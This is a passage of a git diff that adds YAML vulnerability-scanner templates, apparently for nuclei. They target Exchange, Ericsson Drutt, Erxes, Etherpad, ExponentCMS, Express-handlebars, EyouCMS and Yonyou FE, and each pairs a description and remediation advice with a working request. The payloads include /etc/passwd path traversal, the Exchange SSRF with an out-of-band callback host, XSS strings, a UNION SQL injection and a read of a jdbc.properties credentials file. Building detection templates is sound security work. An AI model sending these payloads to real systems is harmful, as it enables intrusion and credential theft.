"官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:http://endress.com/\n\n\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/fcgi-bin/wgsetcgi' + method: POST + body: action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand diff --git a/config/51pwn/yaml/Enterprise Email Archive(EEA)/CNVD-2021-10543.yaml b/config/51pwn/yaml/Enterprise Email Archive(EEA)/CNVD-2021-10543.yaml new file mode 100755 index 000000000..44d815fb2 --- /dev/null +++ b/config/51pwn/yaml/Enterprise Email Archive(EEA)/CNVD-2021-10543.yaml @@ -0,0 +1,29 @@ +id: CNVD-2021-10543 +info: + name: EEA Information Disclosure + author: + - l0ne1y + description: |- + MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞 + MessageSolution 是一套企业邮件归档管理系统。其 authenticationserverservlet 接口存在未授权访问漏洞,攻击者可直接访问该接口获取敏感信息,进而登录系统。 + severity: high + remediation: |- + 官方修复建议: + 升级至最新版本:http://www.messagesolution.cn/。 + + 临时修复建议: + 临时修复方案:
1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: regex + condition: and + regex: + - (.*?) + - (.*?) + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/authenticationserverservlet' + method: GET diff --git a/config/51pwn/yaml/Ericsson Drutt Mobile Service Delivery Platform/CVE-2015-2166.yaml b/config/51pwn/yaml/Ericsson Drutt Mobile Service Delivery Platform/CVE-2015-2166.yaml new file mode 100755 index 000000000..89ad24eb1 --- /dev/null +++ b/config/51pwn/yaml/Ericsson Drutt Mobile Service Delivery Platform/CVE-2015-2166.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-2166 +info: + name: Ericsson Drutt MSDP (Instance Monitor) Directory Traversal + author: + - l0ne1y + description: "Ericsson Drutt Mobile Service Delivery Platform 4/5/6 Instance Monitor + 任意文件读取漏洞\n Ericsson Drutt Mobile Service Delivery Platform (MSDP)是瑞典爱立信(Ericsson)公司的一套为现场和非门户业务的服务交付平台(SDP)提供支持的业务支持系统。\n\nEricsson + Drutt MSDP的Instance Monitor中存在目录遍历漏洞。远程攻击者可借助默认的URI中的‘..\\\\%2f’(点点编码的反斜杠)字符串利用该漏洞读取任意文件。以下版本受到影响:Ericsson + Drutt MSDP 4版本,5版本和6版本。 " + severity: medium + remediation: "官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。\n 目前厂商已经发布了升级补丁以修复此安全问题,详情请关注厂商主页:\nhttp://www.ericsson.com/ + \n\n临时修复方案:
1、过滤\\\".\\\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
5、用户下载文件之前进行权限校验。" +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' + method: GET diff --git a/config/51pwn/yaml/Erxes/CVE-2021-32853.yaml b/config/51pwn/yaml/Erxes/CVE-2021-32853.yaml new file mode 100755 index 000000000..f6f3bd987 --- /dev/null +++ b/config/51pwn/yaml/Erxes/CVE-2021-32853.yaml @@ -0,0 +1,49 @@ +id: CVE-2021-32853 +info: + name: Erxes <= v0.23.0 XSS + author: + - dwisiswant0 + tags: + - cve + - cve2021 + - xss + - erxes + - oss + description: |- + Erxes XSS + Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag. + reference: + - https://securitylab.github.com/advisories/ghsl-2021-103-erxes/ + - https://nvd.nist.gov/vuln/detail/cve-2021-3285 + severity: medium + metadata: + shodan-query: http.title:"erxes" + classification: + cve-id: + - cve-2021-32853 + remediation: |2- + + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32853 + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + condition: and + part: body + words: + - 'topic_id: "' + - window.erxesEnv + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/Etherpad Lite/CVE-2018-9845.yaml b/config/51pwn/yaml/Etherpad Lite/CVE-2018-9845.yaml new file mode 100755 index 000000000..7c2a1e034 --- /dev/null +++ b/config/51pwn/yaml/Etherpad Lite/CVE-2018-9845.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-9845 +info: + name: Etherpad Lite <1.6.4 - Admin Authentication Bypass + author: + - l0ne1y + description: "Etherpad Lite 安全漏洞\n Etherpad Lite是Etherpad基金会的一套开源的富文本在线协作软件。\n\nEtherpad + Lite 1.6.4之前版本中的webaccess.js文件存在安全漏洞。远程攻击者可通过发送特制的请求利用该漏洞绕过安全限制,获取系统的管理权限。 " + severity: critical + remediation: "官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。\n 目前厂商已发布升级补丁以修复漏洞,补丁获取链接:\n\n/~https://github.com/ether/etherpad-lite/blob/develop/CHANGELOG.md + \n\n临时修复方案:
1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。
3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。
4、采用成熟的权限管理框架,如spring security。
5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。
6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。
7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。" +requests: +- matchers: + - type: word + condition: and + part: body + words: + - Etherpad version + - Plugin manager + - Installed parts + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/Admin' + method: GET + max-redirects: 2 + redirects: true diff --git a/config/51pwn/yaml/Exchange/CVE-2021-26855.yaml b/config/51pwn/yaml/Exchange/CVE-2021-26855.yaml new file mode 100755 index 000000000..6d0e2f5a7 --- /dev/null +++ b/config/51pwn/yaml/Exchange/CVE-2021-26855.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-26855 +info: + name: Microsoft Exchange Server SSRF Vulnerability + author: + - l0ne1y + description: |- + Microsoft Exchange Server 远程执行代码漏洞 + Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中: + + 1、在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证。 + + 2、在 CVE-2021-26857 Unified Messaging service 反序列化漏洞中,攻击者可构造恶意请求,触发反序列化漏洞,从而执行任意代码。成功利用该漏洞需要Exchange administrator权限,或需要配合其他漏洞。 + + 3、在 CVE-2021-26858 / CVE-2021-27065 Exchange 任意文件写入漏洞中,攻击者可结合CVE-2021-26855 SSRF漏洞,或提供正确的administrator凭证,构造恶意请求,在系统上写入任意文件。 + severity: critical + remediation: |- + 官方修复建议: + 微软官方已针对该批漏洞发布相关安全更新补丁,可按照以下链接进行升级: + CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 + + 临时修复建议: +
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + raw: + - | + GET /owa/auth/x.js HTTP/1.1 + Host: {{Hostname}} + Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3; diff --git a/config/51pwn/yaml/Exchange/CVE-2021-34473.yaml b/config/51pwn/yaml/Exchange/CVE-2021-34473.yaml new file mode 100755 index 000000000..a8a05b66b --- /dev/null +++ b/config/51pwn/yaml/Exchange/CVE-2021-34473.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-34473 +info: + name: Exchange Server - Remote Code Execution + author: + - l0ne1y + description: |- + Microsoft Exchange Server 远程执行代码漏洞 + Microsoft Exchange Server 是微软公司的一套电子邮件服务组件。2021年8月5日,安全研究员在国外安全会议上公开了CVE-2021-34473 Microsoft Exchange Server 远程代码执行漏洞分析及其POC。攻击者利用该漏洞可绕过相关权限验证,进而配合其他漏洞可执行任意代码,控制Microsoft Exchange Server。微软官方已于2021年4月发布针对该漏洞的更新修补程序,阿里云应急响应中心提醒 Microsoft Exchange Server 用户尽快采取安全措施阻止漏洞攻击。 + severity: critical + remediation: |- + 官方修复建议: + 微软官方于 2021年4月已发布相关补丁,2021年7月发布漏洞通告,可前往微软官方下载相应补丁进行更新:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 + + 临时修复建议: + +
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + condition: or + part: body + words: + - Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException + - Exchange MAPI/HTTP Connectivity Endpoint + path: + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com' + method: GET diff --git a/config/51pwn/yaml/Exchange/CVE-2021-41349.yaml b/config/51pwn/yaml/Exchange/CVE-2021-41349.yaml new file mode 100755 index 000000000..31dbad88c --- /dev/null +++ b/config/51pwn/yaml/Exchange/CVE-2021-41349.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-41349 +info: + name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting + author: + - l0ne1y + description: |- + Microsoft Exchange Server 欺骗漏洞 + Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 + Microsoft Exchange Server存在欺骗漏洞。攻击者可借助特制网站利用该漏洞欺骗内容并诱导用户相信该网站的合法性,同时结合网页服务中的其他漏洞发起攻击。 + 受影响系统: + Microsoft Exchange Server 2019 Cumulative Update 11 + Microsoft Exchange Server 2019 Cumulative Update 10 + Microsoft Exchange Server 2016 Cumulative Update 22 + Microsoft Exchange Server 2016 Cumulative Update 21 + Microsoft Exchange Server 2013 Cumulative Update 23 + severity: medium + remediation: |- + 官方修复建议: + 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: + https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41349 + + 临时修复建议: +
1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: word + condition: and + words: + - alert(document.domain); + - a="" + - type: word + part: header + words: + - text/html + - type: status + status: + - 500 + matchers-condition: and + raw: + - | + POST /autodiscover/autodiscover.json HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + %3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1 diff --git a/config/51pwn/yaml/ExponentCMS/CVE-2021-38751.yaml b/config/51pwn/yaml/ExponentCMS/CVE-2021-38751.yaml new file mode 100755 index 000000000..6619094fa --- /dev/null +++ b/config/51pwn/yaml/ExponentCMS/CVE-2021-38751.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-38751 +info: + name: ExponentCMS <= 2.6 Host Header Injection + author: + - dwisiswant0 + tags: + - cve + - cve2021 + - exponentcms + description: |- + ExponentCMS HTTP 主机标头攻击 + 在 ExponentCMS 2.6 及更低版本的 /exponent_constants.php 中存在 HTTP 主机标头攻击。修改后的 HTTP 标头可以将网页上的链接更改为任意值,从而导致 MITM 的可能攻击向量。 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2021-38751 + - /~https://github.com/exponentcms/exponent-cms/issues/1544 + - /~https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#l56-l64 + severity: medium + classification: + cve-id: + - cve-2021-38751 + cwe-id: + - cwe-116 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/exponentcms/exponent-cms/issues/1544 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '{{randstr}}.tld' + - EXPONENT.PATH + - EXPONENT.URL + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}' + method: GET + headers: + Host: '{{randstr}}.tld' diff --git a/config/51pwn/yaml/Express handlebars/CVE-2021-32820.yaml b/config/51pwn/yaml/Express handlebars/CVE-2021-32820.yaml new file mode 100755 index 000000000..a13c7aa85 --- /dev/null +++ b/config/51pwn/yaml/Express handlebars/CVE-2021-32820.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-32820 +info: + name: Express-handlebars Path Traversal + author: + - dhiyaneshdk + tags: + - cve + - cve2021 + - expressjs + - lfi + - xxe + description: |- + Express-handlebars代码注入漏洞 + handlebars是一款语义化的Web模板系统。 + + Express-handlebars 存在代码注入漏洞,布局参数可能会在下游应用程序中触发文件公开漏洞。 + reference: + - https://securitylab.github.com/advisories/ghsl-2021-018-express-handlebars/ + - /~https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/cve-2021-32820.json + - /~https://github.com/express-handlebars/express-handlebars/pull/163 + severity: high + classification: + cve-id: + - cve-2021-32820 + cwe-id: + - cwe-200 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/express-handlebars/express-handlebars/pull/163 + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + condition: or + part: body + regex: + - 'root:.*:0:0:' + - 'daemon:[x*]:0:0:' + - 'operator:[x*]:0:0:' + matchers-condition: and + path: + - '{{BaseURL}}/?layout=/etc/passwd' + method: GET diff --git a/config/51pwn/yaml/EyouCMS/CVE-2021-39501.yaml b/config/51pwn/yaml/EyouCMS/CVE-2021-39501.yaml new file mode 100755 index 000000000..1406d0ef0 --- /dev/null +++ b/config/51pwn/yaml/EyouCMS/CVE-2021-39501.yaml @@ -0,0 +1,46 @@ +id: CVE-2021-39501 +info: + name: EyouCMS 1.5.4 Open Redirect + author: + - 0x_akoko + tags: + - cve + - cve2021 + - redirect + - eyoucms + - cms + description: |- + EyouCms 输入验证错误漏洞 + 赞赞网络科技 EyouCms(易优CMS)是中国赞赞网络科技公司的一套基于ThinkPHP的开源内容管理系统(CMS)。 + + Eyoucms 1.5.4版本存在安全漏洞,攻击者可以通过注销功能将用户重定向到恶意URL。 + reference: + - /~https://github.com/eyoucms/eyoucms/issues/17 + - https://www.cvedetails.com/cve/cve-2021-39501 + - /~https://github.com/kietna-hpt/cve + severity: medium + classification: + cve-id: + - cve-2021-39501 + cwe-id: + - cwe-601 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.eyoucms.com/ + + 临时修复方案: + 1、令牌同步模式\n令牌同步模式(英语:Synchronizer token pattern,简称STP)。原理是:当用户发送请求时,服务器端应用将令牌(英语:token,一个保密且唯一的值)嵌入HTML表格,并发送给客户端。客户端提交HTML表格时候,会将令牌发送到服务端,令牌的验证是由服务端实行的。令牌可以通过任何方式生成,只要确保随机性和唯一性(如:使用随机种子【英语:random seed】的哈希链 )。这样确保攻击者发送请求时候,由于没有该令牌则无法通过验证。 + 2、检查Referer字段\nHTTP头中有一个Referer字段,这个字段用以标明请求来源于哪个地址。在处理敏感数据请求时,通常来说,Referer字段应和请求的地址位于同一域名下。以银行操作为例,Referer字段地址通常应该是转账按钮所在的网页地址,应该也位于www.examplebank.com之下。而如果是CSRF攻击传来的请求,Referer字段会是包含恶意网址的地址,不会位于www.examplebank.com之下,这时候服务器就能识别出恶意的访问。这种办法简单易行,工作量低,仅需要在关键访问处增加一步校验。但这种办法也有其局限性,因其完全依赖浏览器发送正确的Referer字段。虽然http协议对此字段的内容有明确的规定,但并无法保证来访的浏览器的具体实现,亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器,篡改其Referer字段的可能。 + 3、添加校验token\n由于CSRF的本质在于攻击者欺骗用户去访问自己设置的地址,所以如果要求在访问敏感数据请求时,要求用户浏览器提供不保存在cookie中,并且攻击者无法伪造的数据作为校验,那么攻击者就无法再运行CSRF攻击。这种数据通常是窗体中的一个数据项。服务器将其生成并附加在窗体中,其内容是一个伪随机数。当客户端通过窗体提交请求时,这个伪随机数也一并提交上去以供校验。正常的访问时,客户端浏览器能够正确得到并传回这个伪随机数,而通过CSRF传来的欺骗性攻击中,攻击者无从事先得知这个伪随机数的值,服务端就会因为校验token的值为空或者错误,拒绝这个可疑请求。 +requests: +- matchers: + - type: regex + part: header + regex: + - (?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$ + path: + - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com' + method: GET diff --git "a/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/YonyouFE-sqli-schedule.yaml" "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/YonyouFE-sqli-schedule.yaml" new file mode 100755 index 000000000..f37c0226b --- /dev/null +++ "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/YonyouFE-sqli-schedule.yaml" @@ -0,0 +1,36 @@ +id: YonyouFE-sqli-schedule +info: + name: 用友FE schedule SQL注入 + author: + - 折跃 + description: |- + 用友FE协作办公平台schedule.jsp SQL注入漏洞 + FE业务协作平台存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'c4ca4238a0b923820dcc509a6f75849b') + path: + - '{{BaseURL}}/mas/schedule.jsp?type=group&SGPID=1%27+UNION+ALL+SELECT+1,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271%27)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2010-082455.yaml" "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2010-082455.yaml" new file mode 100755 index 000000000..10fcb7da7 --- /dev/null +++ "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2010-082455.yaml" @@ -0,0 +1,47 @@ +id: wooyun-2010-082455 +info: + name: 用友FE_FILE协议文件读取漏洞 + author: + - 折跃 + description: |- + 用友FE协作办公平台任意文件读取漏洞 + FE业务协作平台存在任意文件读取漏洞,攻击者可利用漏洞读取任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'jdbc.user') + - contains(body,'jdbc.password') + path: + - '{{BaseURL}}/ProxyServletUtil?url=file:/{{dish}}:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties' + attack: batteringram + method: GET + payloads: + dish: + - C + - D + - E + - F + - G + - H + - "Y" + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2010-086697.yaml" "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2010-086697.yaml" new file mode 100755 index 000000000..340ba7a54 --- /dev/null +++ "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2010-086697.yaml" @@ -0,0 +1,37 @@ +id: wooyun-2010-086697 +info: + name: 用友FE协作办公平台5.5注入 + author: + - 折跃 + description: |- + 用友FE协作办公平台5.5 SQL注入漏洞 + FE业务协作平台存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body,'bad SQL grammar [];') + path: + - '{{BaseURL}}/common/treeXml.jsp?type=sort&lx=3&code=1%27' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2015-093724.yaml" "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2015-093724.yaml" new file mode 100755 index 000000000..4b97a7787 --- /dev/null +++ "b/config/51pwn/yaml/FE\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260/wooyun-2015-093724.yaml" @@ -0,0 +1,79 @@ +id: wooyun-2015-093724 +info: + name: 用友FE多个通用注入漏洞 + author: + - 折跃 + description: |- + 用友FE协作办公平台多个SQL注入漏洞 + FE业务协作平台存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 